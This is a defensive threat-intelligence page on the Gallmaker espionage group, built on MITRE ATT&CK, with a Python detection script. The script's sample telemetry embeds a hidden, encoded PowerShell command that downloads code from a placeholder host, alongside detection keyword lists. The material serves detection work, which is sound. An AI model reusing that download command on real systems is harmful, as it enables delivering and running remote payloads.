G0084: Gallmaker
Analyst context for executives and security teams
Gallmaker matters because MITRE describes it as a cyberespionage group focused on Middle East defense, military, and government victims, with activity reported since at least December 2017. The supplied technique relationships point to a practical defensive theme: targeted email attachments, user-driven execution, Windows scripting and DDE execution paths, obfuscation, and archiving of collected data. For leaders, the value is not to assume exposure, but to verify whether high-value users and sensitive functions have resilient email security, endpoint visibility, script logging, and response playbooks for targeted intrusion activity.
Executive priority
Prioritize this as a readiness and assurance question for organizations with government, defense, military, Middle East, or adjacent supply-chain exposure. Executives should ask whether controls and evidence exist across the likely intrusion path: phishing attachment prevention, user execution controls, PowerShell/DDE monitoring, detection of obfuscated content, and signs of data staging through archive utilities. This supports business continuity, incident decision-making, compliance evidence, and risk-based investment without assuming Gallmaker is currently targeting the organization.
Technical view
MITRE provides no dedicated detection text for Gallmaker, so SOC and IR teams should validate coverage against the related ATT&CK behaviors: T1566.001 Spearphishing Attachment, T1204.002 Malicious File, T1059.001 PowerShell, T1559.002 Dynamic Data Exchange, T1027 Obfuscated Files or Information, and T1560.001 Archive via Utility. The relationship set suggests detection should correlate email attachment delivery and user opening events with child process creation, script execution, DDE/OLE-style document behavior, encoded or obfuscated command content, and archive creation in locations associated with user or sensitive data activity.
Likely telemetry
- Email security logs for attachment delivery, sender metadata, attachment names/types, and disposition decisions
- Endpoint process creation telemetry showing document applications spawning script interpreters, shells, archive utilities, or other unusual child processes
- PowerShell execution telemetry, including command line, script block, module, and encoded command indicators where available
- Windows event and endpoint telemetry relevant to DDE/OLE document execution behavior
- File creation and modification events for compressed, encrypted, encoded, or unusually named files
Detection direction
- Validate that detections are behavior-based rather than dependent only on known malware, because the external reference describes the group as using living-off-the-land style activity.
- Tune phishing and malicious-file detections around targeted attachments and follow-on execution, especially document-to-script or document-to-command-line process chains.
- Review PowerShell monitoring for visibility into command content, encoded commands, remote or delegated execution patterns, and suspicious parent processes; account for legitimate administration to reduce false positives.
- Test whether DDE-related document execution is visible in endpoint telemetry and whether older document execution paths are blocked, logged, or merely allowed silently.
- Correlate obfuscation and archive-utility use with user context and data location; archive creation alone is common, but archive activity following suspicious execution is higher value.
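The telemetry and detection points above can be exercised against sample data. The following is an added example, not code from the page, MITRE or Symantec: a Python correlation over constructed process-creation records (assumed minimal shape: time, user, parent, image, cmdline) that flags an Office parent spawning a script host, decodes a PowerShell encoded command, checks it for download cues, and attaches archive-utility launches by the same user shortly afterwards. The process-name sets and the 30-minute window are assumptions to tune locally.

```python
import base64
import re
from datetime import datetime, timedelta

OFFICE = {"winword.exe", "excel.exe", "powerpnt.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe"}
ARCHIVERS = {"winzip32.exe", "winzip64.exe", "7z.exe", "rar.exe"}
ENC_FLAG = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)
DOWNLOAD_CUES = ("downloadstring", "downloadfile", "invoke-webrequest", "start-bitstransfer")

def decode_encoded_command(cmdline):
    """Decode a PowerShell -EncodedCommand argument (base64 of UTF-16LE); None if absent/invalid."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None

def correlate(events, window_minutes=30):
    """Flag Office parent -> script host, decode any encoded command, note download cues,
    and attach archive-utility launches by the same user within the window afterwards."""
    findings, window = [], timedelta(minutes=window_minutes)
    for e in events:
        if e["parent"].lower() not in OFFICE or e["image"].lower() not in SCRIPT_HOSTS:
            continue  # routine admin PowerShell and ordinary archive use are not flagged alone
        decoded = decode_encoded_command(e["cmdline"]) or ""
        later = [a["image"] for a in events
                 if a["user"] == e["user"] and a["image"].lower() in ARCHIVERS
                 and e["time"] < a["time"] <= e["time"] + window]
        findings.append({
            "user": e["user"], "chain": f'{e["parent"]} -> {e["image"]}',
            "decoded": decoded, "archive_followup": later,
            "download_cue": any(c in decoded.lower() for c in DOWNLOAD_CUES),
        })
    return findings

# Constructed sample telemetry (not real Gallmaker artifacts); the encoded command is built here.
SAMPLE_PS = "(New-Object Net.WebClient).DownloadString('http://example.invalid/stage')"
ENC = base64.b64encode(SAMPLE_PS.encode("utf-16-le")).decode()
T0 = datetime(2024, 1, 15, 9, 0)
SAMPLE_EVENTS = [
    {"time": T0, "user": "corp\\jdoe", "parent": "WINWORD.EXE", "image": "powershell.exe",
     "cmdline": f"powershell.exe -nop -w hidden -enc {ENC}"},
    {"time": T0 + timedelta(minutes=12), "user": "corp\\jdoe", "parent": "explorer.exe",
     "image": "winzip64.exe", "cmdline": "winzip64.exe -a docs.zip C:\\Users\\jdoe\\Documents"},
    {"time": T0 + timedelta(minutes=5), "user": "corp\\admin", "parent": "explorer.exe",
     "image": "powershell.exe", "cmdline": "powershell.exe Get-Service"},
]
```

Running `correlate(SAMPLE_EVENTS)` yields one finding for the Word-to-PowerShell chain, with the decoded download command and the later WinZip launch attached; the administrator's PowerShell use is not reported.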
Mitigation priorities
- Start with phishing attachment risk reduction: attachment filtering, detonation or inspection, user reporting workflows, and controls for high-risk file types where operationally feasible.
- Harden user-driven execution paths by restricting unsafe document behaviors and reducing unnecessary DDE/OLE-style execution exposure.
- Constrain and monitor PowerShell use according to administrative need, with logging sufficient for investigation and alert triage.
- Ensure endpoint controls and logging can observe obfuscated files, suspicious command lines, and archive utility use rather than relying only on static signatures.
- Prepare IR playbooks for targeted attachment intrusions, including mailbox review, endpoint containment, script execution review, and search for staged archives.
Analyst notes and limits
The supplied ATT&CK object is a group entry, not a procedure-level incident report. Its official description supports targeting context and sector relevance, while the relationship context supplies the practical behaviors to validate. Because platforms are not specified on the Gallmaker object itself, platform references should be interpreted through the related techniques, especially Windows for PowerShell and DDE.
MITRE provides no official detection guidance for this group object, and the supplied data does not establish current activity, specific victims, infrastructure, malware, exploit use, or guaranteed defensive coverage. Local prioritization requires the organization’s geography, sector, identity exposure, email controls, endpoint visibility, and sensitive data workflows.
Gallmaker
How security teams should use this page
Treat this object as behavior context, not an attribution claim. Validate the related groups, software, data sources, and mitigations against official ATT&CK relationships and your own telemetry before making control-coverage decisions.
Techniques used
This mirrors the MITRE pattern of making group, software, campaign, and technique relationships scannable. Relationship notes come from mirrored ATT&CK relationship text when available.
| Domain | ID | Name | Relationship / procedure |
|---|---|---|---|
| Enterprise | T1204.002 | Malicious File (sub-technique) | Gallmaker sent victims a lure document with a warning that asked victims to “enable content” for execution. [1] |
| Enterprise | T1027 | Obfuscated Files or Information | Gallmaker obfuscated shellcode used during execution. [1] |
| Enterprise | T1560.001 | Archive via Utility (sub-technique) | Gallmaker has used WinZip, likely to archive data prior to exfiltration. [1] |
| Enterprise | T1559.002 | Dynamic Data Exchange (sub-technique) | Gallmaker attempted to exploit Microsoft’s DDE protocol in order to gain access to victim machines and for execution. [1] |
| Enterprise | T1059.001 | PowerShell (sub-technique) | Gallmaker used PowerShell to download additional payloads and for execution. [1] |
| Enterprise | T1566.001 | Spearphishing Attachment (sub-technique) | Gallmaker sent emails with malicious Microsoft Office documents attached. [1] |
All related ATT&CK context
Object version and sync metadata
The fields below describe the current mirrored snapshot. When Glexia retains multiple ATT&CK source imports, you can open the table to compare the same object across releases (hashes and MITRE timestamps). For MITRE’s own release notes and roadmap, see MITRE’s ATT&CK resources (Updates).
Imported snapshots across ATT&CK releases (1)
| Release | Bundle imported | Object version | Modified | Status | Raw hash |
|---|---|---|---|---|---|
| 19.1 | | 1.1 | | Current bundle | f239a2659c1c… |
Mirrored ATT&CK source object
The raw object is retained through the mirrored ATT&CK source bundle and object hash. The raw endpoint returns the exact object from the mirrored bundle when available.
External references and citations
MITRE external references are preserved separately from Glexia analysis so citations remain traceable to their original source records.
- [1] Symantec Gallmaker Oct 2018: Symantec Security Response. (2018, October 10). Gallmaker: New Attack Group Eschews Malware to Live off the Land. Retrieved November 27, 2018.
- [2] Gallmaker (group name citation): see [1], Symantec Gallmaker Oct 2018.
- [3] mitre-attack: G0084.
Source: MITRE ATT&CK®. © 2026 The MITRE Corporation. This work is reproduced and distributed with the permission of The MITRE Corporation. MITRE ATT&CK and ATT&CK are registered trademarks of The MITRE Corporation. Glexia is not affiliated with or endorsed by MITRE.